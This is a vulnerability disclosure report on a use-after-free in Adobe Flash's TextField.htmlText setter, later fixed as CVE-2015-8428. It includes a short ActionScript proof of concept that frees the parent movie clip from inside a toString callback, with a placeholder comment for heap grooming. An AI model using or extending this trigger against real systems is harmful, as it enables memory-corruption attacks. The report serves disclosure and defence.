Adobe Flash: Use-after-free in TextField.htmlText setter

[GoogleCodeExporter]

There is a use-after-free in the TextField.htmlText setter. If the htmlText the 
field is set to is an object with toString defined, the toString function can 
free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.htmlText = {toString : func};

function func(){

    mc.removeMovieClip();

        // Fix heap here

    return "<b>hello</b>";

    }

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 14 Oct 2015 at 1:53

Attachments:

• tabIndex.swf
• tabIndex.fla

[GoogleCodeExporter]

PSIRT-4183

Original comment by natashe...@google.com on 17 Dec 2015 at 10:33

• Changed state: Fixed
• Added labels: CVE-2015-8428
• Removed labels: Restrict-View-Commit